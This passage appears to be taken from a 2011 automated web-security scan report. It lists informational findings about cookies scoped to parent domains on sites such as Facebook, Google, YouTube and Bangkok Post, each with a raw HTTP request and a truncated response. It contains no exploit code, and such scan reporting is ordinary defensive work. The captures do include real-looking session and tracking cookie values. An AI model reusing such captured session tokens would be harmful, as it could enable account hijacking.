<meta content="text/html; charset=UTF-8" http-equiv=Content-type>
<title>Google Videos Error</title>
<link href=/s/WSW5fPU0QIE/css/new_search_c.css rel=stylesheet>
<body>
<div style=margin-bottom:1em
...[SNIP]...

15.41. http://www.bangkokpost.com/business/company-in-thailand/financial/banking/search/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/banking/search/x26amp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /business/company-in-thailand/financial/banking/search/x26amp HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:38:04 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZXIzOXNwNnYyMWNwZTN1a3FmOTBlcGVhaDciO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=m7p0jcnu52i8b59ffdpsdscrf7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21310

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...

15.42. http://www.bangkokpost.com/business/company-in-thailand/financial/search/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /business/company-in-thailand/financial/search/x26amp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /business/company-in-thailand/financial/search/x26amp HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:38:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiNDFlYTd0aDc4OTMwNzNxbHFoNzYwcXA5cDUiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Set-Cookie: PHPSESSID=sp10k0fkgufd7cerlthgse6p52; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 21169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkokpost : B
...[SNIP]...

15.43. http://www.bangkokpost.com/forum/viewtopic.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /forum/viewtopic.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forum/viewtopic.php HTTP/1.1
Host: www.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:38:07 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: phpbb3_forum_u=1; expires=Wed, 02-May-2012 13:38:08 GMT; path=/; domain=.bangkokpost.com; HttpOnly
Set-Cookie: phpbb3_forum_k=; expires=Wed, 02-May-2012 13:38:08 GMT; path=/; domain=.bangkokpost.com; HttpOnly
Set-Cookie: phpbb3_forum_sid=b7f53d5b40c5dd063ef80eb8ba78634c; expires=Wed, 02-May-2012 13:38:08 GMT; path=/; domain=.bangkokpost.com; HttpOnly
Set-Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiajNtZGs0NXE4N2ZsZm4zcGM4dW9yYmRqOTUiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjE1OiIxNzMuMTkzLjIxNC4yNDMiO3M6NjoiU1RBVFVTIjtzOjc6InN1Y2Nlc3MiO30%3D; path=/; domain=.bangkokpost.com; httponly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 16511

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en-gb">
<hea
...[SNIP]...

15.44. http://www.coolthaihouse.com/forum/viewtopic.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coolthaihouse.com
Path:   /forum/viewtopic.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /forum/viewtopic.php HTTP/1.1
Host: www.coolthaihouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 13:37:27 GMT
Server: Apache/2.2.9 (Linux/SUSE)
Set-Cookie: phpbb3_8p4br_u=1; expires=Wed, 02-May-2012 13:37:27 GMT; path=/; domain=.coolthaihouse.com; HttpOnly
Set-Cookie: phpbb3_8p4br_k=; expires=Wed, 02-May-2012 13:37:27 GMT; path=/; domain=.coolthaihouse.com; HttpOnly
Set-Cookie: phpbb3_8p4br_sid=a1740a6cf42ebd62b46b0b81ec8d9ee6; expires=Wed, 02-May-2012 13:37:27 GMT; path=/; domain=.coolthaihouse.com; HttpOnly
Cache-Control: private, no-cache="set-cookie"
Expires: 0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-gb" xml:lang="en-gb">
<hea
...[SNIP]...

15.45. http://www.facebook.com/campaign/landing.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /campaign/landing.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /campaign/landing.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 302 Found
Location: http://www.facebook.com/
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: campaign_click_url=%2Fcampaign%2Flanding.php; expires=Thu, 02-Jun-2011 13:34:05 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.185.127
Connection: close
Date: Tue, 03 May 2011 13:34:05 GMT
Content-Length: 0


15.46. http://www.facebook.com/pages/KTB-Care/178373518915  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/KTB-Care/178373518915

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pages/KTB-Care/178373518915 HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: lsd=z8-YA; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.36.171.104
Connection: close
Date: Tue, 03 May 2011 13:34:01 GMT
Content-Length: 239760

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

15.47. http://www.google.com/finance  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /finance

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /finance HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=46=acSPd8Kefo7UVfp2rrsX7MvMbbFbC_p0DFBwNMSS9hIpvqoBS7sbRUdsd-3AK6Z1qzfNC-3jjdoFTI8QMr8hgigvHeieDToRNhf6IyV8kWDDFmb39r-VWGRaILAhefvc; PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7;

Response

HTTP/1.1 200 OK
Set-Cookie: SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
Date: Tue, 03 May 2011 13:29:14 GMT
Expires: Tue, 03 May 2011 13:29:14 GMT
Cache-Control: private, max-age=0
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: SFE/0.8
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Google Finance: Stock market quotes, news, currency conversions & more</title>
<meta nam
...[SNIP]...

15.48. http://www.multimap.com/clients/places.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.multimap.com
Path:   /clients/places.cgi

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clients/places.cgi HTTP/1.1
Host: www.multimap.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Content-Length: 169
Content-Type: text/html; charset=UTF-8
Location: http://classic.multimap.com/clients/places.cgi
X-BM-Srv: BL2M001203
Date: Tue, 03 May 2011 13:41:27 GMT
Connection: close
Set-Cookie: _HOP=I=1&TS=1304430086; domain=.multimap.com; path=/
Set-Cookie: _SS=SID=C8CACE5402DC44858ED50F83A36DA5A0; domain=.multimap.com; path=/
Set-Cookie: SRCHUID=V=2&GUID=C48621ED84A1449EA22D3F353A841A5D; expires=Thu, 02-May-2013 13:41:26 GMT; path=/
Set-Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110503; expires=Thu, 02-May-2013 13:41:26 GMT; domain=.multimap.com; path=/

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://classic.multimap.com/clients/places.cgi">here</a></body>

15.49. http://www.nbcuniversalstore.com/william-catherine-royal-wedding-dvd/detail.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nbcuniversalstore.com
Path:   /william-catherine-royal-wedding-dvd/detail.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /william-catherine-royal-wedding-dvd/detail.php?p=298028&v=nbcu_featured-products HTTP/1.1
Host: www.nbcuniversalstore.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nbcuniversalstore.com/
Cookie: SESSID=dd19ab195577124911a017a83007c863; DASHORTNAME=nbcuniversalstore; DAABTEST=B

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html
Expires: Tue, 03 May 2011 13:32:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 13:32:59 GMT
Connection: close
Set-Cookie: DACART=deleted; expires=Mon, 03-May-2010 13:32:57 GMT; path=/; domain=nbcuniversalstore.com
Content-Length: 82600


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="
...[SNIP]...

15.50. http://www.scriptlogic.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scriptlogic.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.scriptlogic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scriptlogic.com/landing/google/packettrapit/wireless.asp?src=cps11?s_kwcid=TC|14898|wireless%20network%20strength%20monitor|formlessnetworking.com|C||7322411534
Cookie: ASP.NET_SessionId=xb0qfr4504ypwiftm1n1r545; Referrer=http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com; EntryPoint=/sem/g/content/pt-wireless/070610; __utma=197983533.2053962264.1304447516.1304447516.1304447516.1; __utmb=197983533.1.10.1304447516; __utmc=197983533; __utmz=197983533.1304447516.1.1.utmcsr=sedoparking.com|utmccn=(referral)|utmcmd=referral|utmcct=/search/registrar.php; _jsuid=2631301918575094172; s_cc=true; gpv_p11=landing%3Egoogle%3Epackettrapit%3Ewireless; s_nr=1304447524201-New; s_vnum=1307039515685%26vn%3D1; s_invisit=true; s_sq=slcproduction%3D%2526pid%253Dlanding%25253Egoogle%25253Epackettrapit%25253Ewireless%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.scriptlogic.com%25252F%2526ot%253DA

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:43:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: EntryPointCheck=5/3/2011 9:43:23 AM; domain=scriptlogic.com; expires=Fri, 03-Jun-2011 13:43:23 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 25792


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta name="verify-v1"
...[SNIP]...

15.51. http://www.scriptlogic.com/int/am/prodsel/050709  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scriptlogic.com
Path:   /int/am/prodsel/050709

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /int/am/prodsel/050709 HTTP/1.1
Host: www.scriptlogic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scriptlogic.com/
Cookie: ASP.NET_SessionId=xb0qfr4504ypwiftm1n1r545; Referrer=http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com; EntryPoint=/sem/g/content/pt-wireless/070610; __utma=197983533.2053962264.1304447516.1304447516.1304447516.1; __utmb=197983533.3.10.1304447516; __utmc=197983533; __utmz=197983533.1304447516.1.1.utmcsr=sedoparking.com|utmccn=(referral)|utmcmd=referral|utmcct=/search/registrar.php; _jsuid=2631301918575094172; s_cc=true; gpv_p11=Default; s_nr=1304447642072-New; s_vnum=1307039515685%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D; EntryPointCheck=5/3/2011 9:32:06 AM

Response

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 13:45:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /downloadmanager/default.aspx?focus=108
Set-Cookie: EntryPoint=/int/am/prodsel/050709; domain=scriptlogic.com; expires=Thu, 03-May-2012 13:45:16 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 156

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/downloadmanager/default.aspx?focus=108'>here</a>.</h2>
</body></html>

15.52. http://www.scriptlogic.com/sem/g/content/pt-wireless/070610  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scriptlogic.com
Path:   /sem/g/content/pt-wireless/070610

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sem/g/content/pt-wireless/070610?s_kwcid=TC|14898|wireless%20network%20strength%20monitor|formlessnetworking.com|C||7322411534 HTTP/1.1
Host: www.scriptlogic.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com

Response

HTTP/1.1 302 Found
Date: Tue, 03 May 2011 13:42:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: http://www.scriptlogic.com/landing/google/packettrapit/wireless.asp?src=cps11?s_kwcid=TC|14898|wireless network strength monitor|formlessnetworking.com|C||7322411534
Set-Cookie: ASP.NET_SessionId=h20adracgrtmkruo5uvfe32b; path=/
Set-Cookie: Referrer=http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com; path=/
Set-Cookie: EntryPoint=/sem/g/content/pt-wireless/070610; domain=scriptlogic.com; expires=Thu, 03-May-2012 13:42:21 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 282

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='http://www.scriptlogic.com/landing/google/packettrapit/wireless.asp?src=cps11?s_kwcid=TC|14898|wireless network stren
...[SNIP]...

15.53. http://www.youtube.com/results  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /results

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /results HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:33:57 GMT
Server: wiseguy/0.6.10
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=_hWN399XTxQ; path=/; domain=.youtube.com; expires=Thu, 29-Dec-2011 13:33:57 GMT
Set-Cookie: GEO=84476706a67ed9e0af16319f09944e3fcwsAAAAzVVOtwdbzTcAERQ==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: yNzcxRHpNN0ttUzA3LVpZYlMtWWVCZjF2c0R1cmt3T3pXUDlKMFQwWlNHSklzVzJWd3JtOEpB -->
<head>

<script>
var yt = yt || {};yt.timing = yt.timin
...[SNIP]...

15.54. http://www.youtube.com/watch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /watch

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /watch HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:33:58 GMT
Server: wiseguy/0.6.10
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=Ki6p7Ug9WeY; path=/; domain=.youtube.com; expires=Thu, 29-Dec-2011 13:33:58 GMT
Set-Cookie: GEO=5ac4680f3b160291496141b25e4ac6fbcwsAAAAzVVOtwdbzTcAERg==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html id="watch-html">
<head>
<script>
var yt = yt || {};yt.timing = yt.timing || {};yt.timing.tick = function(label, opt_time) {var timer = yt.timing['timer'] || {};if(opt_t
...[SNIP]...

15.55. http://www2.itt-tech.edu/it/d/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.itt-tech.edu
Path:   /it/d/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /it/d/?code=12268064030|networking%20security HTTP/1.1
Host: www2.itt-tech.edu
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.sedoparking.com/search/registrar.php?registrar=sedonewreg&domain=formlessnetworking.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:35:50 GMT
Server: Apache/2.0.55 (Unix) JRun/4.0
Set-Cookie: ITD=12268064030%7Cnetworking%20security;domain=.itt-tech.edu;expires=Thu, 25-Apr-2041 13:35:50 GMT;path=/
Set-Cookie: FLOWSIM5=http%3A%2F%2Fwww%2Esedoparking%2Ecom%2Fsearch%2Fregistrar%2Ephp%3Fregistrar%3Dsedonewreg%26domain%3Dformlessnetworking%2Ecom;expires=Thu, 25-Apr-2041 13:35:50 GMT;path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 25005


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv="Cont
...[SNIP]...

15.56. http://www22.glam.com/cTagsImg.act  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.glam.com
Path:   /cTagsImg.act

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cTagsImg.act?gname=ct&gvalue=barhp&gtid=218930673&gdata=barhp_rt HTTP/1.1
Host: www22.glam.com
Proxy-Connection: keep-alive
Referer: http://www.barclays.co.uk/Loans/P1242557963420
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; qcsegs=D,T,5150,3726,2951,2705,2698,2696,2693,2692,2690,1988,1902; __utma=234602824.706286063.1303348792.1304359345.1304361407.4

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Content-Length: 153
Content-Type: text/html
Location: http://www35t.glam.com/jsadimp.gif?1^0^2a7da43f1e5878f6f0f6b07ee1b0eeed^116391130334874196611^446224^446224^/^1x1^218930673^31230390^-1^-1^-1^-1^0^0^291013044182651762^p^^0^^US^511^0^0^0^WASHINGTON^0^0^0^0^^barhp_rt
Set-Cookie: ctags=%3bct%3dbarhp; expires=Thu, 02 May 2013 10:24:25 GMT; path=/; domain=.glam.com;
ETag: "d50d5228dd2483ff2a750361030cb091:1274158213"
P3P: policyref="http://www.glammedia.com/about_glam/legal/policy.xml", CP="NON DSP COR PSAo PSDo OUR IND UNI COM NAV STA"
X-Glam-Content: image/gif
Cache-Control: max-age=900
Date: Tue, 03 May 2011 10:24:25 GMT
Connection: close
Vary: Accept-Encoding

<HTML>
<HEAD>
<TITLE>Error Page</TITLE>
</HEAD>
<BODY>
An error (302 Moved Temporarily) has occured in response to this request.
</BODY>
</HTML>

15.57. http://xcdn.xgraph.net/15530/db/xg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://xcdn.xgraph.net
Path:   /15530/db/xg.gif

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /15530/db/xg.gif?pid=15530&sid=10001&type=db&p_bid=4dc048d9159e4ae3 HTTP/1.1
Host: xcdn.xgraph.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Server: Apache-Coyote/1.1
Content-Length: 43
Expires: Tue, 03 May 2011 13:58:22 GMT
